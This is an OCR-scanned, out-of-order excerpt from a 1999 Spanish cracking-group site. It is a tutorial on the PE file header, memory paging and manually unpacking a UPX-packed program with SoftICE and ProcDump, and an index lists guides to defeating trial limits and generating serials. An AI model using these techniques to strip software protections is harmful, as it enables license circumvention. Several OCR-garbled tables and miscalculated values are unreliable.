Hacemos alt+C y bajamos por la ventana de código. Ahora si encontramos un montón de llamadas a APIs W32. Esto no 
se entiende. ¿De dónde salieron estas 

llamadas que no aparecieron en la lista muerta? 


Tal vez si hacemos un volcado con un editor de archivos PE, como PROCDUMP, podamos encontrar alguna orientación. 
Abramos SNIPPETCREATOR con el editor de PROCDUMP. 


¿Qué vemos en la ventana PE Structure Editor? El campo "Entry Point" (punto de entrada) tiene el valor 00018037h. 
Qué rareza. Generalmente este valor es 00001000h para los ejecutables PE. 


Veamos ahora el editor de estructuras (Struct Editor): pulsemos el botón "Sections". Caramba: ninguna sección del 
archivo lleva nombre predefinido. Los nombres que encontramos son: UPX0O, UPX1 y UPX3. El archivo tiene tres 
secciones con nombres no predefinidos. 


Ahora resumamos las observaciones: 

1. Encontramos diferencias entre la lista muerta generada por WDASM y el despliegue en memoria que nos presenta 
SICE. 

2. El punto de entrada del programa no es el convencional. 

3. Las secciones no tienen nombres predefinidos. 

4. El programa no es desplegado inmediatamente en SICE con el LOADER 


De 1 ya podemos deducir que el archivo está encriptado o empaquetado. Cuando generamos la lista muerta, lo que 
conseguimos es el código empaquetado. Para ejecutar el programa, el sistema debe montarlo en RAM, entonces debe 
desempaquetarlo primero. Esta es la importancia de los cargadores (LOADERS), desempaquetan los archivos y 
despliegan su contenido desempaquetado en memoria. Una vez hecho esto, podemos ver su verdadero contenido, incluso 
hasta volcarlo (dumping) a un archivo en disco duro. Esto explica la diferencia entre la lista muerta y el despliegue de 
SICE. 


El punto 2 apoya nuestra primera conclusión. El programa inicia no en su primera instrucción sino en otra, inicia en el 
código que va desempaquetando el programa original. 


El punto 3 es interesante ya que comienza a mostrarnos la importancia de conocer sobre los encabezados PE. Los 
nombres de las secciones, aunque no son los predefinidos, comienzan todos por el mismo prefijo: UPX. Si el archivo está 
empacado, el empacador utilizado cambia el nombre a las secciones y les asigna nuevos que inician con UPX. Veremos 
que con este dato es suficiente para desempacar SNIPPETCREATOR con PROCDUMP. 


El punto 4 nos dice que la sección con las instrucciones ejecutables del programa no tiene asignado los atributos 
correctos. Esto lo veremos luego. 


Nuestro análisis del punto 3 nos permite que ya procedamos a desempaquetar nuestra víctima. Pulsemos el botón 
"UNPACK" de PROCDUMP. En la caja de diálogo "Choose Unpacker" vemos una lista de desempacadores. 
Naveguemos por la lista. Aún sin saber mucho de desempacadores damos de inmediato con el desempacador correcto: 
UPX. Doble click sobre él, escogemos SNIPPETCREATOR, lo desempacamos y lo guardamos en disco duro. 


Ahora abramos el archivo desempaquetado con el PE Editor de PROCDUMP. ¡WAO!: ha cambiado el valor del punto 
de entrada, ahora es 00001000h, el convencional. Ahora echemos un vistazo en "Sections". ¡DE NUEVO WAO!: Ahora 
tenemos cuatro secciones. A las anteriores tres UPXs se agrega .idata, es decir, la sección con datos sobre nombres 
importados. 


También han cambiado las características (CHARACTERISTICS) y los desplazamientos virtuales (Virtual Offset) para 
las secciones. De esto hablaremos luego. 


Ahora hagamos una lista muerta del archivo desempacado. Con WDASM aparecen las llamadas a APIs aunque por 
ordinales. Con IDA PRO sí aparecen las llamadas a las APIs por nombre. El archivo ha sido desempaquetado. Ahora 
podemos sentarnos cómodamente a analizarlo y aprender como se hace un buen editor de archivos PE. 


En realidad no necesitamos PROCDUMP para hacer el desempaquetado. Sólo necesitamos hacer un volcado del 
encabezado PE y ver los nombres de las secciones para identificar el desempaquetador. También, conociendo el formato 
del encabezado, es suficiente abrir el archivo con un buen editor hexadecimal y buscar "manualmente" el encabezado de 
tablas de secciones y veremos los nombres incriminadores que revelan el empacador empleado. 


A propósito, podemos encontrar UPX en http://www.nexus.hu/upx/. Es freeware. Para el momento en que escribo esto, la 
versión disponible es la v0.84. Si comparamos la diferencia de tamaño entre el ejecutable empaquetado y el 
desempaquetado, nos daremos cuenta de la calidad de este empaquetador. No desempaca paquetes de versiones 
anteriores, así que no sirve para desempacar SNIPPETCREATOR v1.05. 


Ahora hasta podemos renombrar las secciones con los nombres predefinidos correspondientes, si quisieramos. Esto 
puede ser útil en ciertas ocasiones que por ahora no pienso mencionar. 


Ahora, supongamos que no tenemos a la mano el desempaquetador preciso, ni tampoco lo suministra PROCDUMP. 
Entonces podemos recurrir a otro método, el descrito por Volatily en su artículo Manually Unpacking - ASPack 
v1.083, que se puede conseguir en el inmeso WEB site de fravia. Es un método un tanto engorroso, pero funciona. Lo 


único es que no desempaca la sección .idata, entonces cuando lo desensamblamos no aparecen los nombres de las 
funciones API W32 en sus llamadas. 


Resumo los pasos de este procedimiento para desempacar manualmente un archivo ejecutable: 


1. Abrimos la víctima (SNIPPETCREATOR) con el PE Editor de PROCDUMP. 
2. Anotamos el punto de entrada (Entry Point): 00018037h 

3. En el editor de estructuras (Structures Editor) pulso "Sections". 

4. Anotamos los datos de la ventana Sections Editor: 


Sections Informations : 


Name | VitualSize_ [VitualOftset_ | RiawSize__ | RawoOltset 


00016000 00001000 0000000 00000400 E0000040 
DODODE50 00017000 00001000 00000400 C0000040 
UP2 00005029 00018000 00005029 00001400 E0000020 


5. Buscamos una sección ejecutable con la bandera de datos inicializados. 
Es la sección UPXO: 


000000040h datos inicializados. 
200000000h ejecutable. 

400000000h se puede leer. 

800000000h se puede escribir en la sección. 


E00000040h 


7. Para que el programa pueda ser desplegado por SICE al iniciar, cambiamos las características de la sección UPXO para 
hacerla una sección de código: reemplazamos E00000040h por E00000020h. Para hacer esto pulsamos sobre el nombre 
de la sección con el botón derecho del ratón y elegimos Edit Section del menú despegado. Se despliega ahora la caja de 
diálogo Modify section value. Reemplazamos el valor en el campo "Section Characteristics". Ahora podemos desplegar 
el ejecutable con el LOADER de SICE y desplegarlos en la pantalla del depurador. Anotamos también el desplazamiento 
(Virtual Offset) de esta sección: 1000h. Seguramente será la dirección donde inicia el programa original. 


8. Cargamos la víctima con SICE. Bajamos por el código del programa empleando la tecla F10, teniendo cuidado de 
colocar puntos de ruptura (BREACKPOINTS) o trampas en las instrucciones inmediatamente después de aquellas donde 
hay saltos hacia arriba. Por ejemplo: 

en la instrucción 0041806F hay un salto hacia arriba: JB 00418060, lo que indica que se trata de un bucle de miles 
vueltas. Entonces hacemos establecemos una trampa en la instrucción siguiente: BPX 00418073, y tecleamos FS para 
pasar por alto este bucle. Este procedimiento debe repetirse para cada bucle encontrado, si no queremos tardar años. 


9. En cualquier momento llegaremos a las instrucciones: 


004181CA 61 POPPAD 
004181CB E9308EfEFF  JMP 00401000 


Es un salto a la dirección 00401000h, que es el desplazamiento donde suponemos que inicia el código original del 
programa. Basamos esta suposición en el hecho de que esta es la dirección que generalmente establece por defecto el 
enlazador como punto de entrada. también en el hecho de que una de las secciones, seguramente la de código (.text) 
inicia aquí. Para asegurarnos que este es el caso, hacemos BPX 004181CB y seguimos (F10). Cuando arribamos a la 
dirección 00401000h ya podemos ver llamadas a funciones W32 API. Quiere decir que estamos en la sección de código. 


10. FS para salir de SICE. Cerramos la víctima y la corremos de nuevo. Seguramente se desplegará SICE en algunos de 
los BREAKPOINTS que dejamos cuando saltábamos bucles grandes.Debemos pulsar ES hasta llegar a 004181CB. 


11. Cuando llegamos aquí, cambiamos la instrucción: 
004181CB E9308EfEFF JMP 00401000 


por: 
004181CB E9308EfEFF — JMP004181CB 


Lo hacemos así: 
a 004181CB ¡mp 004181CB 


12. FS para volver a Win. El programa se ha quedado en un bucle infinito en la memoria. Abrimos PROCDUMP. 
Buscamos en la ventana de tareas (Tasks) de PROCDUMP a la víctima. Pulsamos sobre ella con el botón derecho del 
ratón. Elegimos "Dump (Full)" en el menú desplegado y guardamos el archivo desempacado en disco. 


13. Matamos la tarea víctima. 


14. Cambiamos el punto de entrada: abrimos el archivo desplegado con el PE Editor de PROCDUMP, y reemplazamos el 
valor en Entry Point por 00001000. 


15. Abrimos el archivo ya desempaquetado. Perfecto: funciona. Como vemos su tamaño se ha incrementado una 
barbaridad, lo que indica la potencia del empaquetador UPX. 


Si desensamblamos este desempaquetado con WDASM o con IDA, veremos los problemas de este método de 
desempaquetado: no se desempaqueta la sección de importaciones .idata, por lo tanto, no se despliegan los nombres de 
las funciones W32 API. 


Los primeros bytes del archivo... ¿Corresponden siempre y únicamente a la cabecera? 


Imagino que sí. El encabezado puede diividirse en cuatro grandes partes. La primera es el viejo encabezado DOS. El 
último campo de este encabezado apunta a un campo con un par de caracteres que dicen el formato del archivo 
ejecutable. Ahora, imaginate que este encabezado no esté aquí. El cargador no podría encontrar el encabezado PE ni 
tampoco podría determinar si se trata de un archivo PE (W32) o NE (W16) o LE (052). Hay algunas direcciones que 
varían pero cuando esto ocurre, algún campo del encabezado especifica dónde han sido relocalizados los datos. 


El encabezado es una estructura de datos por la cual el cargador de W32 siempre se orienta para acelerar la carga del 
ejecutable en vez de implementar algún algorritmo inteligente de búsqueda que impicaría un mayor costo en cuanto 
tiempo y trabajo de programación. 


¿Cuantos bytes tiene la cabecera? 


Respecto al tamaño, hay un campo que especifica este valor y se llama SizeOfHeaders y está en el encabezado PE 
(estructura _IMAGE_FILE_HEADER). El valor varía de acuerdo al número de secciones u objetos del PE. 


El valor decimal de "size of image'' en ProcDump no corresponde al tamaño real del fichero. ¿Por qué? 


Esto es consecuencia de los alineamientos. Realmente este campo indica la cantidad de espacio que se reserva en el 
espacio de direcciones para cargar el ejecutable. Una cosa es la memoria virtual reservada y otra la memoria física 
comprometida. Yo puedo reservar 10 MB e ir comprometiendo bloques de 300 KB según la necesidad que tenga de ello. 
Evidentemente, la memoria reservada deberá ser igual o mayor al tamaño de la imagen. El valor de "size of image"que 
vemos, por ejemplo, en ProcDump depende del valor "SectionAlignement", es decir, del alineamiento de las secciones. 
Es uno de los campos opcionales de la estructura _IMAGE_FILE_HEADER. 


Una página mide 4096 bytes. Si un PE tiene 3 secciones, todas de un tamaño menor a 4096 bytes, y si estas, de acuerdo a 
SectionAlignement" están alineadas en límites de 65.536 bytes, el tamaño de la imagen será 3 * 65.356 = 196.608 bytes. 


Si yo estoy creando el programa puedo controlar el valor de "size of image" variando "SectionAlignement" en las 
opciones del enlazador (de TLINK o de LINK), pero esto no es necesario, porque el mismo enlazador determina el valor 
de "SectionAlignement" a partir del tamaño de cada sección. 


Si la mayoría de los ejecutables tienen la misma dirección base 00400000h ¿como pueden proyectarse varios 
ejecutables a la vez? ¿Qué pasa cuando dos ejecutables tienen igual la: direccionbase + puntoentrada? 


Esto se aclara viendo cómo W32 convierte direcciones virtuales en direcciones reales. Es una cuestión crucial en SOs 


multiprocesos. W32 es uno de estos SOs, también UNIX y LINUX. Para no enredar mucho las cosas, se puede decir que 
W32 crea en memoria física una tabla para cada proceso en ejecución. Esta tabla contiene direcciones de entradas de otra 
tabla que son punteros hacia las direcciones en memoria real donde se encuentran las instrucciones o los datos cargados 
en la RAM. La dirección física de la primera entrada de la tabla que transforma direcciones virtuales en reales está en un 
registro del CPU llamado CR3 (CONTROL REGISTER 3). Para cualquier aplicación puedes obtener el valor en este 
registro empleando SICE simplemente con el comando CPU, el cual muestra el valor en los diferentes registros del CPU. 
Hay que tener en cuenta que el valor de CR3 es sólo la dirección física de la primera entrada de una tabla de punteros a 
direcciones físicas de otra tabla. Se requiere todavía tener el número de la entrada de esta primera tabla para saber donde 
está en la memoria física la segunda tabla. 


Fíjate que casi todas las direcciones virtuales de una aplicación comienzan con 0040XXXXh. No voy a explicarlo, pero 
esto indica la primera entrada de la tabla apuntada por CR3. Lo cierto es que cada tabla primaria es también una página 
de 4096 bytes, dividida en 1024 entradas de 32 bytes que son punteros a la base de otra tabla en memoria física. 


Ahora, ¿por qué un ejecutable en memoria no interrumpe a otro, aunque tengan las mismas bases virtuales? Las posibles 
respuestas a esta pregunta me parece que ya se tienen de alguna manera. La dirección real o física de la página de 
directorio activa se almacena en el registro CR3 del CPU, el cual cambia cada vez que W32 conmuta el control entre 
procesos. Para cada proceso, el sistema crea un directorio de página particular. Para procesos distintos no deben coincidir 
los directorios de página, de lo contrario se producirá un error de protección, como a veces ocurre. 


¿Qué utilidad tiene dividir los ejecutables en secciones? 


Para facilitar la ubicación de los datos. Además porque, como expliqué, cada sección tiene diferente función y diferentes 
atributos. Imagina el enrredo si el enlazador al crear el programa pusiera el código junto a los datos, mezclados con los 
recursos y otras cosas: uff! Esto es así siempre, incluso en DOS. Lo que pasa es que en DOS se segmenta la memoria; 
W32 la pagina. También podemos encontrar otras razones que exigirían el manejo de conceptos que finalmente terminan 
enrredándonos más y haciéndonos parecer que se trata de una cosa muy compleja. Se trata de explicaciones que podemos 
encontrar en libros sobre arquitectura de computadoras. Hay varios en español, posiblemente en alguna biblioteca. 


W32 puede manejar 4 Gb ffff:ffffffff que vemos en el sice. FFFFh x FFFFFFFFh = FFFF0001h = 4294901761 
bytes = 4 Gb Lo cual quiere decir que las direcciones que siempre vemos en sice no son de la ram sino de la 
memoria virtual ¿no? 


Muy cierto. Esto creo que cambiará el día que ya no necesitemos memoria virtual. De todos modos, si se tiene suficiente 
cantidad de RAM, en ocasiones podemos prescindir de ella. Yo nunca he probado, pero me han comentado que es más 
rápido. 


Las paginas de memoria parecen importantes ¿qué son? ¿Qué relación tienen con las direcciones que vemos en 
SICE? 


W32 divide la memoria física en "páginas" que tiene una longitud de 4096 bytes (4 KB). Una máquina con 8 MB de 
memoria tiene 2048 páginas. W32 mantiene una colección de tablas de página (también de 4 KB) para traducir 
direcciones virtuales a direcciones físicas. Cada proceso tiene su propia "página de directorio": una colección de hasta 
1024 entradas de 32 bits almacenadas contiguamente. La dirección real o física de la página de directorio activa se 
almacena en el registro CR3 del CPU, el cual cambia cada vez que W32 conmuta el control entre procesos. Por eso, las 
direcciones virtuales iguales entre dos procesos diferentes no apuntan a la misma dirección física, a no ser que refieran a 
espacios de memoria compartidos. 


Las direcciones que despliega SICE son virtuales y a partir de ellas se puede determinar la dirección de memoria física 
donde están los datos o instrucciones correspondientes. Para ello se puede emplear el comando PHYS, que busca la tabla 
de páginas y el Directorio de páginas asociado con el contexto de direcciones actual desplegado por SICE. Es decir, 
PHYS despliega todas las direcciones virtuales para direcciones físicas. Puede emplearse PEEK para leer desde la 
memoria física, ya que muestra el byte, word, o dword en una dirección física dada. PEEK es útil para leer registros de 
entrada o salida proyectados en memoria. También es útil el comando PAGE, el cual permite ver la proyección de todo el 
rango de direcciones lineales. Esto permite obtener la dirección física del directorio de página y verificar si las tablas de 
páginas del sistema operativo están proyectadas en la dirección lineal 0xC0000000. Véase La Memoria en W32: intro. 


¿Por qué necesitamos alineamientos? ¿ Por qué FileAligment usualmente usa límites en 512 bytes y 
SectionAlignment (después de que la imagen fue cargada en RAM) usualmente usa límites de 4096 bytes? 


W32 trata con paginación de memoria física y usa memoria virtual. Entonces W32 tiene que manejar memoria virtual y 
debe tener una manera rápida de encontrar los datos del archivo. Estas son las razones de la existencia del encabezado 


PE. 


W32 pagina la memoria física, la divide en regiones de tamaño fijo. En la arquitectura x86 cada página tiene un tamaño 
de 4096 bytes. Cualquier sección cargada en RAM debe tener un alineamiento para soportar paginación de memoria. 
Cuando el sistema reserva memoria, asegura que la región reservada sea un múltiplo par del tamaño de página. 
SectionAlignment garantiza que cada sección comience en una dirección virtual alineada a una página 


File Alignment es un valor que debe ser potencia de 2 entre 512 y 65,535. Es "la granularidad mínima de pedazos 
(chunks) de información dentro de la imagen antes de ser cargada" [Katz]. En el archivo PE, los datos brutos que 
comprenden cada sección deben comenzar en un múltiplo de FileAlignment. El valor por defecto es 512 bytes, 
probablemente para asegurar que las secciones siempre inicien en el comienzo de un sector del disco (el cual también 
tiene un tamaño de 512). 


¿Qué es un proceso? 


W32 llama proceso a un programa en ejecución. Un proceso posee un espacio de 4 GB con los datos y el código del 
archivo EXE de la aplicación. Un proceso es inerte, no hace nada. Para que haga algo debe poseer un hilo, el cual se 
responsabiliza de ejecutar el código presente en el espacio de direcciones del proceso. Incluso, un proceso puede tener 
más de un hilo en el mismo espacio de direcciones ejecutándose al mismo tiempo. Pero el proceso necesita por lo menos 
un hilo para ejecutar el código proyectado en su espacio de direcciones, en caso contrario el sistema destruye el proceso 
y su espacio de direcciones. 


¿Qué es un hilo (thread)? 


Es la descripción de la trayectoria que sigue la ejecución de un proceso. Cuando arranca un proceso, el sistema crea un 
hilo principal (llamando a CreateThread) el cual comienza llamando a la función WinMain, ejecutándola hasta alcanzar 
la función ExitProcess que culmina el proceso. La noción de hilo fue implementada por W32 para dar cuenta de la 
posiblidad de los procesos W32 de correr más de un subproceso al mismo tiempo. W32 llama hilos a los subprocesos. 


Bueno. Lo visto hasta ahora puede servir como una introducción al conocimiento de los archivos con formato PE y para 
adquirir cierta conciencia de la importancia de este asunto. Realmente deberíamos profundizar más. 


Como vieron he escogido como víctima a SNIPPETCREATOR. No es casual. Se trata de un programa muy poderoso, 
pero que requiere conocimiento de programación en ASM W32 y conocer el formato PE. Si tienes a la mano MASM 6.X 
o TASM 5.X, entonces podemos avanzar ya al estudio de SNIPPETCREATOR, lo cual nos dará mayor conocimiento 
sobre los archivos PE: 


snippetcreator: tutorial (en elaboración) 


Si no tienes conocimiento del lenguaje ensamblador para W32, pero todavía te interesa el tema de los PE, entonces 
pasemos a estudiar la sección de recursos de estos archivos. 


Y tú, > de recursos (en elaboración) 


GRACIAS A: 


e GERZA: por haberme animado a escribir sobre el tema y orientarme cómo hacerlo. 
e Iczelion y Stone: creadores de dos herramientas maravillosas. 


Observaciones y correcciones, comunicarse con: 


nuMIT_orQ iname.com 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


SN" 
Whiskey Kon Tekila 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


COMPRESION / DESCOMPRESION By WKT 

Code Snippet Creator v1.05: (W95/W98/NT) 

Descabezando archivos ejecutables portables 

Comprender la estructura y el contenido del encabezado de los 
archivos con formato PE 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 InuMIT_or  [W32DASM32 8.93 y/o IDA PRO, 
EXeScope v4.40, Softlce (opcional) 


La Memoria en W32: Intro (W95/W98/NT) 


Suministrar conocimiento que permita comprender cómo W32 
traduce direcciones virtuales en direcciones físicas. 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 [nuMIT_or  [W32DASM32 8.93 y/o IDA PRO, 
EXeScope v4.40 (opcional), Softlce 


Reversing with ToPo v1.0 (W95/W98/NT) 


Cómo usar ToPo v1.0 


] Topo v1.0, Uedit y (opcionalmente) 
23/10/99 MrCimson | SoftICE 


[Descompresión manual con ProcDump (W95) 
¡Como usar el ProcDump para descomprimir/desencriptar tus cobayas. 
(31/08/99 Mr.Orange ¡Softlce v3.25, ProcDump 


Winboost 2000 v1.0.0.1999 (W95/W98/NT) 


Cómo saber si un programa esta comprimido. Uso del ProcDump. 
Cómo eliminar una "protección anti-desensamblado" 


¡Obtener un número de Serie Válido 

: ProcDump v1.5, Gettyp v2.38, 
Ú sd Me-Walle | rs2dasm 18:93. UltaEdit v6 104 
[WkT!] FAQ 


[12 [3] [WT] 1999 


Respuesta a las Preguntas típicas de Ingenieria Inversa 


>» 
Win 


Como Crackear por Estado+Porcino 


Como Crackear por O | 
Estado+Porcino. Capítulo 7 PLLIO PIS. 


Curso de CrAcKinG. 7) Desclavando cruces con o ose de Arimatea. 
-Como Crackear Ulead Media Studio Pro v5.01- ;- 


Como Crackear por AE " ¡0ñó 
Estado+Porcino. Capítulo 6 Aaa ROrDO! (HbIO 

Curso de CrAcKinG. 6) Desvirgando Expedientes X 

-Como Crackear Contaplus Elite Pyme- ;-?) 

Como Crackear por Meal dd 
Estado+Porcino. Capítulo 5 e A 
Curso de CrAcKinG. 5) Color Crack. (Quien dijo ke el amarillo daba 
mala suerte ;-?) 


Como Crackear por MER EOS 
Estado+Porcino. Capítulo 4 ai nds 
Curso de CrAcKinG. 4) Haciendo de Cerrajeros 


Como Crackear por. Mr Pink Mayo 1998 


Curso de CrAcKinG. 3) Corta Historia del Tiempo 


E a is 
Estado+Porcino. Capítulo2. [PLCTIT0O POS 


Curso de CrAcKinG. 2) Diseccionando a los Muertos 


Como Crackear por Estado+Porci Diciembre 1997 
Estado+Porcino. Capítulo 1 | a 


[Curso de CrAcKinG. 1) Orígenes 


¡SoftIce Debugger 


[Introducción al Softlce Mr.Brown [1998 
[Instalación y Consejos para iniciarse en el Debugger Softlce 


[Comandos del Softlce Mr.Brown 11998 
[Referéncia Resumen de los comandos disponibles en el Softlce 3.22 


[Uso de Breakpoints Mr.Brown 11998 
[Recomendaciones e Ideas sobre Puntos de Ruptura en el Softlce. 


Ingenieria Inversa Utilizando la función Mr. WhiTe (1999 
HMEMCPY Ae 


¿Qué es y cómo utilizar HMEMCPY? 


WEA 


[Visual Basic Cracking 


[Cuentapasos v3.75 (W95/W98/NT) 
¡Simular estar registrados. 


18/10/99 MéBIS Softlce v4.0, SmartCheck 
6.0, Spy++ 


[Advanced Video Poker v1.1 (W95) 


Buscar el número de serie y crear su Key-Generator 


14/08/99 Mr.GReeN E v6.01 (Build 


[Crackeando en VB [Esiel2 ¡Junio de 1999 


Este tutorial contiene lo basico a mi entender que debes saber de 
herramientas y de algunas funciones que tanto le gusta llamar al 
Visual Basic. 


[CuentaPasos v3.72 [Esiel2 (02/05/99 


Conseguir que no caduque nunca el programa. 


Funciones del Visual Basic 

E Mr.Brown 1998 

Listado de las funciones de msvbvm50.DLL, para tracear pgms de 
E 


Win 


UNIX Cracking 


Programas de Evaluación limitados por 
Fes Bart ¡Octubre 1998 


Cómo saltarse la protección de programas de evaluación. 


[ Plantilla en formato htm | Plantilla en 
formato zip ] 
Win 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 
[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


MH WkrTutoriazsite PA 


Whiskey Kon Tekila 


Code Snippet Creator 1.05: 


Programa Descabezando archivos ejecutables portables W95 / W98 / NT 
Herramienta para crear recortes (snippets) de código a ser insertos en archivos 
Descripción 
a ARK — de formato PE y agregar funcionalidades. 
o Tipo Eje pq empaquetado 


Url http://www.wco.com/-micuan/Tools/snipc105.zip 
Protección Empaquetamiento de ejecutable con formato PE 
Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 


Hex Workshop u otro buen editor hexdecimal. 


ProcDump v1.5 
Herramientas W32DASM32 8.93 y/o IDA PRO 


eXeScope v4.40 
Opcional: NotePad Softlce v3.0 o superior Oxígeno 


Comprender la estructura y el contenido del encabezado de los archivos con 
Objetivo 
formato PE 


[Cracker IA IA 


E — Octubre de 1999 


Ve 
Descabezando archivos ejecutables portables 


Introducción 


He tenido noticias de algunos interesados en conocer sobre un tema en el que he estado trabajando: el formato de los 
archivos ejecutables portables, conocidos como los "PE files". Como acostumbro a llevar notas de lo que hago, he 
reunido y ordenado este material esperando que pueda ser útil. No me responsabilizo del uso que hagan otros de él. 


PE es el formato adoptado por W32 (Windows a 32 bits) para sus archivos ejecutables (EXE), sus librerías dinámicas 


(DLL), dispositivos virtuales (VXD), etc. W32 adoptó este formato debido a las posibilidades que quedaban abiertas al 
implementar direcciones y punteros de 32 bits y debido al manejo de la memoria que estas posibilidades exigían. 


ALGO SOBRE MEMORIA VIRTUAL 


W32 implementa un manejo de memoria que supone paginación, dividide la memoria física en bloques de memoria fija 4 
KB llamados "páginas". Al proceso de dividir la memoria en páginas se llama paginación. Se trata de una técnica muy 
empleada en los sistemas operativos multitareas (capaces de ejecutar más de una tarea al mismo tiempo) para manejar la 
memoria dinámica del sistema (RAM = Randow Access Memory = Memoria de Acceso Aleatorio) de manera que 
ninguna tarea altere los datos de otra o la intervenga negativamente en su comportamiento. 


W32 emplea punteros y direcciones de 32 bits. Esto quiere decir que, si lo tuvieramos, podríamos usar una memoria de 
4GB para cada programa en ejecución. Pero aunque no tengamos todavía ships con esta capacidad de memoria, los 
programas en W32 corren como si la tuvieran a su disposición. El sistema W32 asigna a cada proceso o programa en 
ejecución un espacio de direcciones ficticio de 4GB, un montón de memoria que sólo existe imaginariamente, llamada 
"memoruia virtual". Luego, para ejecutar código del programa o disponer de sus datos, transforma, a través de un par de 
tablas, las direcciones ficticias en direcciones reales en la memoria física. 


Para comprender cómo W32 transforma direcciones virtuales en direcciones físicas para que el CPU pueda acceder a las 
instrucciones del programa montadas en la RAM, sugiero la lectura del artículo "La Memoria en W32: intro" que 


seguramente acompaña a este que lees ahora. 


El tema de la memoria virtual da para más y conviene tratarlo aparte. Ahora nos ocupan los PE. 
- 
Vi 


Teoría y un poco de práctica.. 


ARCHIVOS EN GENERAL Y EL FORMATO PE 


Un archivo no es más que un conjunto de datos organizados en varias entidades llamadas "registros". Un registro es lo 
que conocemos en programación como "estructura", es decir, un espacio en memoria que se emplea para guardar datos 
de manera ordenada. 


Una estructura se divide en entidades de tamaño definido destinadas a almacenar datos de justo ese tamaño. A cada una 
de estas "celdas" de la estructura la llamamos campos. 


Las estructuras o registros permiten almacenar información, en sus campos, sobre entidades particulares. En este sentido, 
la estructura es una colección de campos que pueden ser tratados como una unidad por algún programa. Es un bloque de 
datos organizado en campos sobre una entidad específica.Toda estructura posee un nombre que la identifica y permite 
localizarla o manejarla; este nombre es una varable del tipo de la estrcuctura que nombra y permite el tratamiento de las 
entidades de las cuales informa la estrcutura. 


Ahora bien, a la información contenida en un archivo se puede acceder de manera secuencial o directa. El modo 
secuencial es lento en muchos casos ya que se necesita revisar cada dato desde el comienzo del archivo con orden 
secuencial, hasta dar con el buscado. Por esto, la mayoría de las veces lo mejor es ir directamente al dato buscado, sin 
tener que revisar todos los campos del archivo. 


Para facilitar el acceso directo a los datos, se pueden colocar unos directorios al comienzo del archivo que indiquen 
dónde se encuentran ciertos tipos de datos. Los directorios son estructuras cuyos campos, llamados entradas del 
directorio, son tablas que tienen la misma estrcutura. Funcionan como un "directorio" telefónico. Si busco un dato de 
cierto tipo, reviso el directorio y veo dónde están agrupados esos datos. Luego voy a la sección donde se encuentran los 
datos de este tipo. Seguramente en esta sección habrá una tabla que me informe sobre lo que hay en ella. Reviso entonces 
esta tabla y con lo que me dice, busco el dato que me interesa: no tengo que ir dato por dato para encontrar lo que busco. 


Este es el principio a partir del cual se ideó el formato de los archivos PE, y facilitar el montaje del programa en la RAM: 
se coloca al principio del archivo una serie de estructuras que informan sobre el contenido del archivo. El contenido del 
archivo se divide en secciones cada una con datos de cierto tipo, formando el cuerpo del archivo. Las estructuras al 
comienzo del archivo forman el encabezado del archivo y nos dicen la dirección donde se ubica cada sección, su tamaño 
y sus atributos. A la vez, cada sección implementa tablas con información particular sobre el contenido de su cuerpo. 


Entonces, en los archivos con formato PE, tenemos un encabezado y un cuerpo. El encabezado de los archivos PE se 
subdivide en, podríamos decir, cuatro subencabezados: 


El encabezado DOS MZ 

El encabezado PE 

El encabezado NT opcional 

El conjunto de tablas de secciones 


Veámos la organización en la siguiente tabla: 


PE EXE (Windows 32Bit EXE, DLL, OCX, etc) 


Contiene información necesaria para ejecutar el DOS 
STUB. Conservado por compatibilidad 


Encabezado MZ EXE 


El desol : OFESET) 3Ch 7 Encabezado DOS 
Encabezado MZ extendido esplazamiento ( ) apunta a 
encabezado PE 
Agregado para 


avisar que el 
programa rueda en 
Windows 


Usualmente despliega 'Requires windows to run' o un 
mensaje similar 


DOS STUB 


Encabezado PE Contiene info necesaria para correr el programa en 
Win32 
Contiene info adicional necesaria para correr el O 
Encabezado opcional NT ] P agregados por W32 
programa en Win32 


EEE PEA ., . . . 
Tabla de Objetos o Secciones Información sobre objetos o secciones en el archivo 


Datos de las secciones 


Objetos o secciones Cuerpo del archivo 


El cuerpo del archivo con formato PE se subdivide en un número no fijo de secciones, cada una de las cuales dividida 
también en una tabla de sección, que nos informa sobre el contenido de la sección, y el cuerpo de sus datos. 


Veamos ahora con detenimiento el encabezado. 


RASTROS ARCÁICOS: ENCABEZADO DOS MZ 


Los archivos ejecutables con formato PE inician con el encabezado DOS MZ, que no es más que el antiguo encabezado 
de los archivos EXE más algunos campos adicionales que se agregaron para posibilitar la transición. 


El encabezado DOS, conservado por compatibilidad, es el mismo que empleaban los antiguos programas DOS de 16 bits, 
más unos campos adicionales. Su estructura (en ensamblador) es: 


_IMAGE_DOS_ HEADER STRUC 
SII 
; CAMPOS TRADICIONALES 
SIA LIA AIR II 
e_magic DW ? 

e_cblp DW ? 

e_cp DW ? 

e_crlc DW ? 

e_cparhdr DW ? 

e_minalloc DW ? 

e_maxalloc DW ? 

e_ss DW ? 

e_sp DW ? 

e_csum DW ? 

e_ip DW ? 

e_cs DW ? 

e_lfarlc DW ? 

e_ovno DW ? 
SIA 

; CAMPOS ADICIONALES 
SIA 
e_res DW 4 DUP (?) 

e_oemid DW ? 

e_oeminfo DW ? 

e_res2 DW 10 DUP (?) 

e_lfanew DD ? 

_IMAGE_DOS_ HEADER ENDS 
PIMAGE_DOS_HEADER TYPEDEF NEAR PTR _IMAGE_DOS_ HEADER 


Quien no entienda esta estructura puede orientarse por la siguiente tabla: 


Encabezado EXE MZ 


10000 [Word [ID "MZ - Etiqueta de archivo EXE 
10002 [Word [Número de bytes en la última página o bloque de 512 bytes del ejecutable. 
10004 [Word [Número de todas las páginas de 512 bytes en el ejecutable (incluyendo la última) 
10006 [Word [Número de entradas de la tabla de relocalizaciones 
10008 [Word [Tamaño del encabezado en parágrafos (16 bytes) 


0004 (Word Tamaño mínimo de los parágrafos de memoria localizada por encima del final del programa ya 


cargado en RAM. 

Tamaño máximo de los parágrafos de memoria localizada por encima del final del programa 
000C ¡Word 

ya cargado en RAM. 


000E ¡Word ¡[SS (Stack Segment) relativo al inicio del ejecutable 
